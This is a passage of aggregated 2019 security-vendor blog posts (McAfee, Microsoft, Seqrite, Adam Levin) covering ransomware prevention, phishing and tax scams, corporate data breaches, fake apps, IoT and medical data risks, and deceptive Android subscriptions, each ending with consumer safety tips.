Wallet Id: 1FKWhzAeNhsZ2JQuWjWsEeryR6TqLkKFUt

 

Prevention tips:

  1. Regularly take a backup of your important data in external drives like HDD, pen drive or Cloud storage.
  2. Install an antivirus and keep it updated.
  3. Keep your Operating System and software up-to-date.
  4. Never click on links or download attachments from any unknown or unwanted sources.

Subject Matter Expert:

Nagesh lathakar, Pratik Pachpor | Quick Heal Security Labs

The post JCry – A Ransomware written in Golang! appeared first on Seqrite Blog.

The language of InfoSec

As the cybersecurity industry has evolved, one dynamic has remained consistent: our industry-“speak”. We use a language that is very unique, difficult for new folks to understand, and oftentimes just plain sensationalistic. While any industry has its own technical terms, our language can also be a barrier to recruitment for many. This should be of concern to all of us in cybersecurity as we look to become more inclusive, rather than exclusive.

Language often reflects and supports a culture. Culture is defined by language norms and values of its people. It is easy to become conditioned to the way we speak and use terminology. As we look to how we can encourage industry growth and maturity, we should strive to evolve the way we use our industry’s nomenclature to be more open and consider how we are defining and shaping our industry’s culture through language. The exciting thing is, the opportunity is right before us, because cybersecurity is constantly evolving.

There are many examples of words that are part of the InfoSec culture – words that do not easily translate to people without a deep industry background. My approach is to avoid hyper technical or sensationalistic terms, and to create a language baseline that is simple and inclusive. Then, I put it to the test: Is the cyber language we’re speaking something my family can understand? Are there other terms we could use to simplify unique technical terms? Can we all agree to search for new words and try them out?

Let’s consider terms like sandboxing, detonation chamber, whitelists, blacklists, and so forth. While each have specific purposes, we should ask ourselves: are there different ways of saying the same things or defining these terms? What would the synonym be for “blacklist” and would “filtering known bad sites” or “risk lists” suffice?

We must also examine and test whether ways that are more easily understood help to make the industry appear more open and accepting to a broader, more diverse audience or talent population. This is not a matter appearing politically correct – it is a matter of being pragmatic and understanding we will not solve the talent shortage in cybersecurity if we do not make some fundamental changes to the industry. One of the simple changes we could make is to make our common industry vernacular less intimidating.

Testing the waters, I fielded this very topic about whether our industry terms are terrifying and/or confusing to those not in the industry. While many shared examples of cyber terms we should explore, there was agreement that most of our vernacular leans to weaponized or militaristic language.

As a technology professional with 30 years of experience working for companies that are not pure security focused, I have spent many hours creating glossaries and explaining InfoSec language to my colleagues. Quite often there are raised eyebrows and snickers at some of the things we consider common language – as well as questioning and commentary on how unique security people are. I have no issue with uniqueness or deep skills, but that does not mean everything the industry does needs to be unique. The days of security by obscurity are dead.

The cyber insiders club we have created for ourselves is not what makes us special. What makes us special is that we are required to adapt quickly, evolve, and grow. If we don’t, we will become extinct. Bad actors are continually changing and modernizing their tools and methods. They recognize the evolution of InfoSec as an opportunity of scale. By allowing more people to easily understand the fundamentals of security and take an active role in shaping its culture, we can and will build better defenses. Imagine how much easier your job would be if you didn’t spend the first 30-minutes of every InfoSec-related meeting developing a common understanding of language.

If we are to truly influence and shape our industry’s culture, I am asking everyone in the industry to examine how and what we communicate, how we can make cybersecurity easier to understand by the language we use. Thus we will become more open and inclusive. We can do so much if we embrace change and growth, and open our arms to those who have so much to contribute, but who may not “speak” our language.

The post The language of InfoSec appeared first on Microsoft Security.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Steer clear of tax scams

In the month of February, we saw an average of 300,000 phishing attempts across Microsoft’s browsing platforms daily. Our security experts expect these attempted scams to become increasingly more prevalent through the April 15 Tax Day, especially in the two weeks leading up to it, when about 25 percent of people file their taxes. The phishing campaigns we’ve seen aren’t just in the U.S., though; we’ve also recently uncovered similar tactics in Canada, Brazil and India. It’s important for users across the globe to follow best practices and stay vigilant.

With less than a month until the filing deadline in the U.S., we are urging the public to take the following simple steps to avoid tax scams – especially during the last-minute rush to file taxes.

  • Watch for suspicious emails. Be suspicious of all links and attachments, especially when the email seems “off” or unexpected – like an unexpected email from your credit card company, or financial institution. Phish-y emails often include spelling and grammatical errors, or will ask you to send personal information. In these cases, you can apply additional scrutiny on the sender, the content, and any links and attachments. If you know the sender, for example, you can double-check with them before opening or downloading the file.
  • Carefully inspect URLs. Hover over links to verify that the URL goes to the website where it’s supposed to direct you. Is it pointing to the site you expected? URL shorteners provide a lot of convenience, but can make this inspection difficult. If you’re unsure, rather than clicking a link, use search engines like Bing to get to the tax-related website you’re looking for and log in from there.
We recently discovered a phishing campaign targeting Canadian Tax payers where scammers were pretending to help Canadian taxpayers get their refunds, but really aimed to steal banking credentials. We’ve also seen old phishing documents resurface – these claim to be from the Canada Revenue Agency (CRA), inform victims that they have a refund via e-transfer from the CRA, and ask them to divulge their bank details where the funds will be “deposited”. We’ve also seen similar campaigns in Brazil and India.
  • Be wary of any attachments. If you haven’t just made a purchase for tax software, don’t be tricked by getting an email with an invoice from a tax preparation company. Sending fake invoices for services is one of the top methods attackers use to trick people into opening a malicious attachment that could automatically execute malware on your computer. Malicious attachments could also contain links that download and execute malicious programs. We’ve seen PDFs that contain innocuous-looking links that lead to people accidentally downloading malicious software designed to steal credentials, like usernames and passwords.
  • Don’t rely on passwords alone. Scammers take advantage of weak or stolen passwords used across multiple websites, so don’t just rely on your password to keep you safe. When possible, always use multi-factor authentication like the Microsoft Authenticator app for managing your sign-ins for Microsoft accounts and others, and Windows Hello for easy and secure sign-in to your Windows 10 device. These solutions enable biometric authentications like your face or fingerprint to quickly and safely sign in across devices, apps and browsers without you having to remember passwords. Did you know that with a Microsoft Account, you can securely and automatically sign-in to other Microsoft cloud-based applications including Bing, MSN, Cortana, Outlook.com, Xbox Live (PC only), Microsoft Store and Office?
  • Keep software current. Run a modern operating system, like Windows 10 or Windows 10 in S mode, with the latest security and feature updates, in tandem with next-generation anti-malware protection, such as Windows Defender Antivirus.

Microsoft security solutions can proactively inspect links and attachments, as well as block phishing documents and other malicious downloads to help protect users, even if they accidentally click a phishing link or open a malicious attachment. We expect tax scams to be on the rise in the next several months as global tax deadlines approach so our experts will be on the lookout for new campaigns.

Here’s a couple of examples of what we’ve seen just in the last few weeks: two documents named irs_scanned_551712.doc and Tax(IP.PIN).doc. You’ll notice that the security tools built into Microsoft Office caught these and displayed a warning at the top. Before enabling content like these, ensure that the sender is a trusted source, and notice things like missing or misspelled words.

tax-related phishing document with malicious macro code

tax-related phishing document with malicious macro code

Be on the lookout for scams like we’ve described here. There will undoubtedly be more schemes that crop up. Stay vigilant! Learn how to report phishing scam websites through Microsoft Edge or Internet Explorer and suspicious email messages through Outlook.com, Outlook 2016, or Office 365.

Keep these tips and tricks handy, and share with your networks so we can increase awareness of and stop the spread of Tax Day scams! For more information about Microsoft Security, please visit microsoft.com/security.

The post Steer clear of tax scams appeared first on Microsoft Security.

Possible Toyota Breach Affects Up to 3.1 Million Customers

Multiple sales subsidiaries of Toyota Motor Corp. were breached in an apparent cyberattack that may have leaked the personal information of up to 3.1 million people in the Tokyo area.

Toyota announced the possible breach as being the result of “unauthorized access” to a network server containing customer information in late March, but explained that they were unable to confirm if any data was actually lost.

The hacking attempt was followed the next day by similar cyberattacks on Toyota’s subsidiaries in Vietnam and Thailand, each of which issued statements about the possibility of breaches without any further details or confirmation regarding the data compromised.

These three attempts followed another announcement made by Toyota’s Australian subsidiary in February, where it disclosed an attempted hack but was similarly light on details.

Toyota has yet to issue further statements on these incidents, but has apologized and promised to implement stronger security measures on their networks and at their facilities.

 

The post Possible Toyota Breach Affects Up to 3.1 Million Customers appeared first on Adam Levin.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

British Government Report Confirms Huawei Cybersecurity Concerns

A report issued by the British government has concluded that products developed and manufactured by the Chinese telecommunications company Huawei present significant security risks.

Assembled by the Huawei Cyber Security Evaluation Centre (HCSEC) and presented to the UK National Security Adviser, the report found that on a wide range of security issues related to both its software and engineering, Huawei has failed to maintain adequate protections.

“Poor software engineering and cybersecurity processes lead to security and quality issues, including vulnerabilities. The number and severity of vulnerabilities discovered, along with architectural and build issues, by the relatively small team in HCSEC is a particular concern. If an attacker has knowledge of these vulnerabilities and sufficient access to exploit them, they may be able to affect the operation of the network, in some cases causing it to cease operating correctly,” stated the report, going on to add:

“These findings are about basic engineering competence and cybersecurity hygiene that give rise to vulnerabilities that are capable of being exploited by a range of actors.”

Huawei has been the subject of ongoing controversy in the West. Its bids to build the infrastructure for 5G wireless networks have been blocked in the United States, Australia, and New Zealand for security reasons and allegations that their equipment has backdoors that the Chinese government can exploit. U.S. Secretary of State Mike Pompeo has warned European nations that using Huawei equipment make it “more difficult” for the U.S. to partner with them.

Huawei is currently suing the United States over the ban, and the company’s chairman Guo Ping accused the U.S. government of having a “loser’s attitude,” and that “The U.S. has abandoned all table manners.”

The post British Government Report Confirms Huawei Cybersecurity Concerns appeared first on Adam Levin.

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to obtain effects like denial-of-service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in Webkit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace it with a bulletproof password to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent  Mobile Threat Report, you don’t know because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60-90 apps installed on their phones. Multiply that between all the users in your home, and you are looking at anywhere from 200-500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically, hidden apps (such as TimpDoor) get to users via Google Play when they download games or customized tools. TimpDoor will then directly communicate with users via a text with a link to a voice message that gives detailed instructions to enable apps from unknown sources. That link downloads malware which will run in the background after the app closes. Users often forget they’ve downloaded this and go on with life while the malware runs in the background and can access other internal networks on the smartphone.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year it is the 60 million+ downloaded game Fortnite. The Fortnite craze has lead hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, crypto jack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were stored in plaintext in an internal company database. This means that thousands of Facebook employees had access to the database and could have potentially searched through these user passwords. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is in the process of investigating long-term infrastructure changes to prevent these security issues going forward.

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Users: Here are Proactive Tips to Keep Your Data Safe appeared first on McAfee Blogs.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with a nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when you’re visiting these sites you’re not clicking on any conspicuous ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website from the company displaying the ad as opposed to clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

How to Safeguard Your Family Against A Medical Data Breach

Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

The IoT Factor

Medical Data Breach

Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

Medical Data Breach

Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices

Medical Data Breach

According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
